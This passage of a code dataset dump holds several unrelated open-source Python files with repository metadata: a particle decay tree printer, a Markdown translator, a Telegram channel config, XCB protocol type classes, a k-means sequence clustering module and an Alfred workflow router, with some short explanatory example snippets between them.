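The export endpoint above is easiest to see end-to-end from the client side. A minimal sketch, assuming a reachable deployment at BASE (the host is an assumption; only the path, query parameters, and response shape come from the apidoc block above):

import requests

BASE = "http://tcloud.example.com"  # assumed host, not part of the source
params = {"projectid": 4, "versionid": 173, "page_size": 1}
resp = requests.get(BASE + "/v1/issue/export", params=params)
body = resp.json()
if body["code"] == 0:
    print(body["data"])  # URL of the generated xls, as in the success example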
PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | 0 | 10321 | # <NAME>, DESY
# <EMAIL>
#
# this tool is based on Luca Lista's tree drawer module
class ParticleDecayDrawer(object):
"""Draws particle decay tree """
def __init__(self):
print "Init particleDecayDrawer"
# booleans: printP4 printPtEtaPhi printVertex
def _accept(self, candidate, skipList):
if candidate in skipList: return False
return self._select(candidate)
def _select(self, candidate):
return candidate.status() == 3
def _hasValidDaughters(self, candidate):
nDaughters = candidate.numChildren()
for i in xrange(nDaughters):
if self._select(candidate.listChildren()[i]): return True
return False
def _printP4(self, candidate):
return " "
def _decay(self, candidate, skipList):
out = str()
if candidate in skipList:
return ""
skipList.append(candidate)
id = candidate.pdg_id()
# here the part about the names :-(
out += str(id) + self._printP4(candidate)
validDau = 0
nOfDaughters = candidate.numChildren()
for i in xrange(nOfDaughters):
if self._accept(candidate.listChildren()[i], skipList): validDau+=1
if validDau == 0: return out
out += " ->"
for i in xrange(nOfDaughters):
d = candidate.listChildren()[i]
if self._accept(d, skipList):
decString = self._decay(d, skipList)
if ("->" in decString): out += " ( %s ) " %decString
else: out += " %s" %decString
return out
def draw(self, particles):
""" draw decay tree from list(HepMC.GenParticles)"""
skipList = []
nodesList = []
momsList = []
for particle in particles:
if particle.numParents() > 1:
if self._select(particle):
skipList.append(particle)
nodesList.append(particle)
for j in xrange(particle.numParents()):
mom = particle.listParents()[j]
while (mom.mother()):
mom = mom.mother()
if self._select(mom):
momsList.append(mom)
print "-- decay --"
if len(momsList) > 0:
if len(momsList) > 1:
for m in xrange(len(momsList)):
decString = self._decay( momsList[m], skipList)
if len(decString) > 0:
print "{ %s } " %decString
else:
print self._decay(momsList[0], skipList)
if len(nodesList) > 0:
print "-> "
if len(nodesList) > 1:
for node in nodesList:
skipList.remove(node)
decString = self._decay(node, skipList)
if len(decString) > 0:
if "->" in decString: print " ( %s ) " %decString
else: print " " + decString
else:
skipList.remove(nodesList[0])
print self._decay(nodesList[0], skipList)
print
| en | 0.722725 | | 2.957251 | 3
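The drawer above relies only on a small duck-typed particle interface, so it can be smoke-tested without HepMC bindings. A minimal sketch (FakeParticle is hypothetical; run under Python 2, matching the module's print statements):

class FakeParticle(object):
    # Implements just the methods ParticleDecayDrawer.draw() actually calls.
    def __init__(self, pdg, parents=None, children=None):
        self._pdg = pdg
        self._parents = parents or []
        self._children = children or []
    def status(self): return 3          # the drawer only keeps status == 3
    def pdg_id(self): return self._pdg
    def numParents(self): return len(self._parents)
    def listParents(self): return self._parents
    def mother(self): return self._parents[0] if self._parents else None
    def numChildren(self): return len(self._children)
    def listChildren(self): return self._children

p1, p2 = FakeParticle(2212), FakeParticle(2212)   # two incoming protons
z = FakeParticle(23, parents=[p1, p2])            # a Z boson with two parents
p1._children = [z]
p2._children = [z]
ParticleDecayDrawer().draw([z])                   # prints the decay tree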
translator.py | liuprestin/pyninjaTUT-translator | 0 | 10322 | <gh_stars>0
from translate import Translator
translator = Translator(to_lang="zh")
try:
with open('./example.md', mode='r') as in_file:
text = in_file.read()
with open('./example-translated.md', mode='w') as trans_file:
trans_file.write(translator.translate(text))
except FileNotFoundError as e:
print('check your file path') | none | 1 | 3.014315 | 3 |
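One possible hardening of the script above, assuming the backing translation provider caps request length (the whole file is currently sent in a single call): translate paragraph by paragraph and rejoin the pieces.

def translate_chunks(translator, text, sep="\n\n"):
    # Translate each non-empty paragraph on its own and stitch the results back.
    return sep.join(translator.translate(part) if part.strip() else part
                    for part in text.split(sep))

The write call would then become trans_file.write(translate_chunks(translator, text)).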
|
reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 187 | 10323 | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
def send_post(submission, r2t):
return r2t.send_simple(submission,
text='{title}\n\n{self_text}\n\n/r/{subreddit_name}\n{short_link}',
gif='{title}\n\n/r/{subreddit_name}\n{short_link}',
img='{title}\n\n/r/{subreddit_name}\n{short_link}',
album='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}',
other='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}'
)
| en | 0.735217 | #encoding:utf-8 | 2.509786 | 3 |
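weighted_random_subreddit is imported from utils and not shown in this row; a plausible implementation, assuming the dict maps subreddit names to selection probabilities:

import random

def weighted_random_subreddit(weights):
    # Draw one subreddit name with probability proportional to its weight.
    names = list(weights)
    return random.choices(names, weights=[weights[n] for n in names], k=1)[0]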
xcbgen/xtypes.py | tizenorg/framework.uifw.xorg.xcb.xcb-proto | 1 | 10324 | '''
This module contains the classes which represent XCB data types.
'''
from xcbgen.expr import Field, Expression
import __main__
class Type(object):
'''
Abstract base class for all XCB data types.
Contains default fields, and some abstract methods.
'''
def __init__(self, name):
'''
Default structure initializer. Sets up default fields.
Public fields:
name is a tuple of strings specifying the full type name.
size is the size of the datatype in bytes, or None if variable-sized.
nmemb is 1 for non-list types, None for variable-sized lists, otherwise number of elts.
booleans for identifying subclasses, because I can't figure out isinstance().
'''
self.name = name
self.size = None
self.nmemb = None
self.resolved = False
# Screw isinstance().
self.is_simple = False
self.is_list = False
self.is_expr = False
self.is_container = False
self.is_reply = False
self.is_union = False
self.is_pad = False
self.is_switch = False
self.is_bitcase = False
def resolve(self, module):
'''
Abstract method for resolving a type.
This should make sure any referenced types are already declared.
'''
raise Exception('abstract resolve method not overridden!')
def out(self, name):
'''
Abstract method for outputting code.
These are declared in the language-specific modules, and
there must be a dictionary containing them declared when this module is imported!
'''
raise Exception('abstract out method not overridden!')
def fixed_size(self):
'''
Abstract method for determining if the data type is fixed-size.
'''
raise Exception('abstract fixed_size method not overridden!')
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
'''
Default method for making a data type a member of a structure.
Extend this if the data type needs to add an additional length field or something.
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(complex_type.fields):
if field == _placeholder_byte:
complex_type.fields[idx] = new_field
return
complex_type.fields.append(new_field)
class SimpleType(Type):
'''
Derived class which represents a cardinal type like CARD32 or char.
Any type which is typedef'ed to cardinal will be one of these.
Public fields added:
none
'''
def __init__(self, name, size):
Type.__init__(self, name)
self.is_simple = True
self.size = size
self.nmemb = 1
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['simple']
# Cardinal datatype globals. See module __init__ method.
tcard8 = SimpleType(('uint8_t',), 1)
tcard16 = SimpleType(('uint16_t',), 2)
tcard32 = SimpleType(('uint32_t',), 4)
tint8 = SimpleType(('int8_t',), 1)
tint16 = SimpleType(('int16_t',), 2)
tint32 = SimpleType(('int32_t',), 4)
tchar = SimpleType(('char',), 1)
tfloat = SimpleType(('float',), 4)
tdouble = SimpleType(('double',), 8)
class Enum(SimpleType):
'''
Derived class which represents an enum. Fixed-size.
Public fields added:
values contains a list of (name, value) tuples. value is empty, or a number.
bits contains a list of (name, bitnum) tuples. items only appear if specified as a bit. bitnum is a number.
'''
def __init__(self, name, elt):
SimpleType.__init__(self, name, 4)
self.values = []
self.bits = []
for item in list(elt):
# First check if we're using a default value
if len(list(item)) == 0:
self.values.append((item.get('name'), ''))
continue
# An explicit value or bit was specified.
value = list(item)[0]
if value.tag == 'value':
self.values.append((item.get('name'), value.text))
elif value.tag == 'bit':
self.values.append((item.get('name'), '%u' % (1 << int(value.text, 0))))
self.bits.append((item.get('name'), value.text))
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['enum']
class ListType(Type):
'''
Derived class which represents a list of some other datatype. Fixed- or variable-sized.
Public fields added:
member is the datatype of the list elements.
parent is the structure type containing the list.
expr is an Expression object containing the length information, for variable-sized lists.
'''
def __init__(self, elt, member, *parent):
Type.__init__(self, member.name)
self.is_list = True
self.member = member
self.parents = list(parent)
if elt.tag == 'list':
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
elif elt.tag == 'valueparam':
self.expr = Expression(elt, self)
self.size = member.size if member.fixed_size() else None
self.nmemb = self.expr.nmemb if self.expr.fixed_size() else None
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for its name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.expr.resolve(module, self.parents)
# Find my length field again. We need the actual Field object in the expr.
# This is needed because we might have added it ourself above.
if not self.fixed_size():
for parent in self.parents:
for field in parent.fields:
if field.field_name == self.expr.lenfield_name and field.wire:
self.expr.lenfield = field
break
self.resolved = True
def fixed_size(self):
return self.member.fixed_size() and self.expr.fixed_size()
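# Example: a variable-length list such as
#   <list type="CARD8" name="name"><fieldref>name_len</fieldref></list>
# produces a ListType whose member is fixed-size but whose expr depends on the
# name_len field, so fixed_size() returns False and the enclosing structure's
# calc_size() falls through to size = None.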
class ExprType(Type):
'''
Derived class which represents an exprfield. Fixed size.
Public fields added:
expr is an Expression object containing the value of the field.
'''
def __init__(self, elt, member, *parents):
Type.__init__(self, member.name)
self.is_expr = True
self.member = member
self.parents = parents
self.expr = Expression(list(elt)[0], self)
self.size = member.size
self.nmemb = 1
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.resolved = True
def fixed_size(self):
return True
class PadType(Type):
'''
Derived class which represents a padding field.
'''
def __init__(self, elt):
Type.__init__(self, tcard8.name)
self.is_pad = True
self.size = 1
self.nmemb = 1 if (elt == None) else int(elt.get('bytes'), 0)
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
class ComplexType(Type):
'''
Derived class which represents a structure. Base type for all structure types.
Public fields added:
fields is an array of Field objects describing the structure fields.
'''
def __init__(self, name, elt):
Type.__init__(self, name)
self.is_container = True
self.elt = elt
self.fields = []
self.nmemb = 1
self.size = 0
self.lenfield_parent = [self]
def resolve(self, module):
if self.resolved:
return
pads = 0
# Resolve all of our field datatypes.
for child in list(self.elt):
if child.tag == 'pad':
field_name = 'pad' + str(pads)
fkey = 'CARD8'
type = PadType(child)
pads = pads + 1
visible = False
elif child.tag == 'field':
field_name = child.get('name')
fkey = child.get('type')
type = module.get_type(fkey)
visible = True
elif child.tag == 'exprfield':
field_name = child.get('name')
fkey = child.get('type')
type = ExprType(child, module.get_type(fkey), *self.lenfield_parent)
visible = False
elif child.tag == 'list':
field_name = child.get('name')
fkey = child.get('type')
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'valueparam':
field_name = child.get('value-list-name')
fkey = 'CARD32'
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'switch':
field_name = child.get('name')
# construct the switch type name from the parent type and the field name
field_type = self.name + (field_name,)
type = SwitchType(field_type, child, *self.lenfield_parent)
visible = True
type.make_member_of(module, self, field_type, field_name, visible, True, False)
type.resolve(module)
continue
else:
# Hit this on Reply
continue
# Get the full type name for the field
field_type = module.get_type_name(fkey)
# Add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# Recursively resolve the type (could be another structure, list)
type.resolve(module)
self.calc_size() # Figure out how big we are
self.resolved = True
def calc_size(self):
self.size = 0
for m in self.fields:
if not m.wire:
continue
if m.type.fixed_size():
self.size = self.size + (m.type.size * m.type.nmemb)
else:
self.size = None
break
def fixed_size(self):
for m in self.fields:
if not m.type.fixed_size():
return False
return True
class SwitchType(ComplexType):
'''
Derived class which represents a List of Items.
Public fields added:
bitcases is an array of Bitcase objects describing the list items
'''
def __init__(self, name, elt, *parents):
ComplexType.__init__(self, name, elt)
self.parents = parents
# FIXME: switch cannot store lenfields, so it should just delegate the parents
self.lenfield_parent = list(parents) + [self]
# self.fields contains all possible fields collected from the Bitcase objects,
# whereas self.items contains the Bitcase objects themselves
self.bitcases = []
self.is_switch = True
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
def resolve(self, module):
if self.resolved:
return
# pads = 0
parents = list(self.parents) + [self]
# Resolve all of our field datatypes.
for index, child in enumerate(list(self.elt)):
if child.tag == 'bitcase':
field_name = child.get('name')
if field_name is None:
field_type = self.name + ('bitcase%d' % index,)
else:
field_type = self.name + (field_name,)
# use self.parent to indicate the ancestor,
# as switch does not contain named fields itself
type = BitcaseType(index, field_type, child, *parents)
# construct the switch type name from the parent type and the field name
if field_name is None:
type.has_name = False
# Get the full type name for the field
field_type = type.name
visible = True
# add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# recursively resolve the type (could be another structure, list)
type.resolve(module)
inserted = False
for new_field in type.fields:
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(self.fields):
if field == _placeholder_byte:
self.fields[idx] = new_field
inserted = True
break
if False == inserted:
self.fields.append(new_field)
self.calc_size() # Figure out how big we are
self.resolved = True
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for its name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
# size for switch can only be calculated at runtime
def calc_size(self):
pass
# note: switch is _always_ of variable size, but we indicate here whether
# it contains elements that are variable-sized themselves
def fixed_size(self):
return False
# for m in self.fields:
# if not m.type.fixed_size():
# return False
# return True
class Struct(ComplexType):
'''
Derived class representing a struct data type.
'''
out = __main__.output['struct']
class Union(ComplexType):
'''
Derived class representing a union data type.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_union = True
out = __main__.output['union']
class BitcaseType(ComplexType):
'''
Derived class representing a struct data type.
'''
def __init__(self, index, name, elt, *parent):
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
ComplexType.__init__(self, name, elts[1:])
self.has_name = True
self.index = 1
self.lenfield_parent = list(parent) + [self]
self.parents = list(parent)
self.is_bitcase = True
def make_member_of(self, module, switch_type, field_type, field_name, visible, wire, auto):
'''
register BitcaseType with the corresponding SwitchType
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
# We dump the _placeholder_byte if any bitcases are added.
for (idx, field) in enumerate(switch_type.bitcases):
if field == _placeholder_byte:
switch_type.bitcases[idx] = new_field
return
switch_type.bitcases.append(new_field)
def resolve(self, module):
if self.resolved:
return
self.expr.resolve(module, self.parents+[self])
# Resolve the bitcase expression
ComplexType.resolve(self, module)
class Reply(ComplexType):
'''
Derived class representing a reply. Only found as a field of Request.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_reply = True
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
self.fields.append(Field(tcard32, tcard32.name, 'length', False, True, True))
ComplexType.resolve(self, module)
class Request(ComplexType):
'''
Derived class representing a request.
Public fields added:
reply contains the reply datatype or None for void requests.
opcode contains the request number.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.reply = None
self.opcode = elt.get('opcode')
for child in list(elt):
if child.tag == 'reply':
self.reply = Reply(name, child)
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
if module.namespace.is_ext:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'minor_opcode', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
else:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
if self.reply:
self.reply.resolve(module)
out = __main__.output['request']
class Event(ComplexType):
'''
Derived class representing an event data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for eventcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
tmp = elt.get('no-sequence-number')
self.has_seq = (tmp == None or tmp.lower() == 'false' or tmp == '0')
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
if self.has_seq:
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['event']
class Error(ComplexType):
'''
Derived class representing an error data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for errorcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'error_code', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['error']
_placeholder_byte = Field(PadType(None), tcard8.name, 'pad0', False, True, False)
| en | 0.850046 | | 3.120223 | 3 |
BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | 1 | 10325 | # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
def parseFasta(data):
d = {fasta.id : str(fasta.seq) for fasta in SeqIO.parse(data, "fasta")}
pd.DataFrame([d])
s = pd.Series(d, name='Sequence')
s.index.name = 'ID'
s.reset_index()
return pd.DataFrame(s)
def kmerXTable(s, a, b):
tfid_vector = TfidfVectorizer(analyzer='char', ngram_range=(a,b))
s_hat = tfid_vector.fit_transform(s.Sequence)
kmerNames = tfid_vector.get_feature_names()
kmers = s_hat.toarray()
return pd.DataFrame(kmers,columns=kmerNames, index = s.index)
# credit to chunrong
def read_fasta_sequences(sequence_paths):
all_sequences = pd.DataFrame()
for path in sequence_paths:
path = os.path.join("media", path)
sequence = parseFasta(path)
all_sequences = pd.concat([all_sequences, sequence])
return all_sequences
def kmeans(userId, fasta, klength_min, klength_max, rNum, cNum, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
km = KMeans(random_state = rNum, n_clusters = cNum)
km.fit(kmerXTableInput)
y_hat = km.predict(kmerXTableInput)
plotly_kmertable = kmerXTableInput
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerXTableInput)
plot_div = plotly_dash_show_plot(userId, plotly_kmertable, y_hat, "Unsupervised Kmeans", method)
inputData.insert(0, "Labels", y_hat)
return [[inputData], [plot_div]]
def kmeans_semiSupervised(userId, fasta, klength_min, klength_max, rNum, y_hat, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
PCAembedding = PCA(n_components=10)
NkmerXTableInput = preprocessing.normalize(kmerXTableInput)
PCAembedding_low = PCAembedding.fit_transform(NkmerXTableInput)
ms = MeanShift()
ms.fit(PCAembedding_low)
cluster_centers = ms.cluster_centers_
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
kmms = KMeans(init = cluster_centers, n_clusters = len(cluster_centers))
kmms_labels = kmms.fit_predict(PCAembedding_low)
# convert all clusters into two clusters
kmerXTableInput["pLabels"] = kmms_labels
kmerXTableInput["aLabels"] = y_hat.tolist()
newLabels_clusters_1 = kmerXTableInput[kmerXTableInput["aLabels"] == 1]["pLabels"].tolist()
newLabels_clusters_0 = kmerXTableInput[kmerXTableInput["aLabels"] == 0]["pLabels"].tolist()
newLabels = []
for label in kmms_labels:
if newLabels_clusters_1.count(label) > newLabels_clusters_0.count(label):
newLabels.append(1)
else:
newLabels.append(0)
kmerTable = kmerXTableInput.drop(columns=["pLabels", "aLabels"])
plotly_kmertable = kmerTable
plotly_labels = np.array(newLabels)
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerTable)
plotly_div = plotly_dash_show_plot(userId, plotly_kmertable, plotly_labels, "Semi-supervised Kmeans", method)
inputData.insert(0, "Labels", newLabels)
return [[inputData], [plotly_div]]
| # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
def parseFasta(data):
d = {fasta.id : str(fasta.seq) for fasta in SeqIO.parse(data, "fasta")}
pd.DataFrame([d])
s = pd.Series(d, name='Sequence')
s.index.name = 'ID'
s.reset_index()
return pd.DataFrame(s)
def kmerXTable(s, a, b):
tfid_vector = TfidfVectorizer(analyzer='char', ngram_range=(a,b))
s_hat = tfid_vector.fit_transform(s.Sequence)
kmerNames = tfid_vector.get_feature_names()
kmers = s_hat.toarray()
return pd.DataFrame(kmers,columns=kmerNames, index = s.index)
# credit to chunrong
def read_fasta_sequences(sequence_paths):
all_sequences = pd.DataFrame()
for path in sequence_paths:
path = os.path.join("media", path)
sequence = parseFasta(path)
all_sequences = pd.concat([all_sequences, sequence])
return all_sequences
def kmeans(userId, fasta, klength_min, klength_max, rNum, cNum, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
km = KMeans(random_state = rNum, n_clusters = cNum)
km.fit(kmerXTableInput)
y_hat = km.predict(kmerXTableInput)
plotly_kmertable = kmerXTableInput
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerXTableInput)
plot_div = plotly_dash_show_plot(userId, plotly_kmertable, y_hat, "Unsupervised Kmeans", method)
inputData.insert(0, "Labels", y_hat)
return [[inputData], [plot_div]]
def kmeans_semiSupervised(userId, fasta, klength_min, klength_max, rNum, y_hat, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
PCAembedding = PCA(n_components=10)
NkmerXTableInput = preprocessing.normalize(kmerXTableInput)
PCAembedding_low = PCAembedding.fit_transform(NkmerXTableInput)
ms = MeanShift()
ms.fit(PCAembedding_low)
cluster_centers = ms.cluster_centers_
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
kmms = KMeans(init = cluster_centers, n_clusters = len(cluster_centers))
kmms_labels = kmms.fit_predict(PCAembedding_low)
# convert all clusters into two clusters
kmerXTableInput["pLabels"] = kmms_labels
kmerXTableInput["aLabels"] = y_hat.tolist()
newLabels_clusters_1 = kmerXTableInput[kmerXTableInput["aLabels"] == 1]["pLabels"].tolist()
newLabels_clusters_0 = kmerXTableInput[kmerXTableInput["aLabels"] == 0]["pLabels"].tolist()
newLabels = []
for label in kmms_labels:
if newLabels_clusters_1.count(label) > newLabels_clusters_0.count(label):
newLabels.append(1)
else:
newLabels.append(0)
kmerTable = kmerXTableInput.drop(columns=["pLabels", "aLabels"])
plotly_kmertable = kmerTable
plotly_labels = np.array(newLabels)
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerTable)
plotly_div = plotly_dash_show_plot(userId, plotly_kmertable, plotly_labels, "Semi-supervised Kmeans", method)
inputData.insert(0, "Labels", newLabels)
return [[inputData], [plotly_div]]
| en | 0.861432 | # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID. # All rights reserved. # This file is part of the BioKlustering Website. # credit to chunrong # convert all clusters into two clusters | 2.48096 | 2 |
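A minimal driver sketch for the kmeans() helper in the record above. The user id, FASTA file name, and parameter values are invented for illustration; read_fasta_sequences resolves the path under media/.
results, plots = kmeans(
    userId=1,                      # hypothetical user id
    fasta=["example.fasta"],       # hypothetical file resolved under media/
    klength_min=2, klength_max=3,  # k-mer range for the TF-IDF vectorizer
    rNum=42,                       # random_state for KMeans
    cNum=2,                        # number of clusters
    method="PCA",
)
labeled_df, plot_html = results[0], plots[0]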
workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 13 | 10326 | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| en | 0.451041 | # -*- coding: utf-8 -*- # e.g., args = ":config sethost http://localhost,--exec" # :config sethost http://localhost # show menu | 1.983528 | 2 |
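An illustrative pair of calls into route() above, mirroring the example argument string in the source comment. The command strings are hypothetical and the calls assume the Alfred workflow environment that workflow() expects.
route([':repos my-project', '--exec'])  # runs the repositories action
route([':help'])                        # only renders the help menu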
model/model.py | CaoHoangTung/shark-cop-server | 2 | 10327 |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
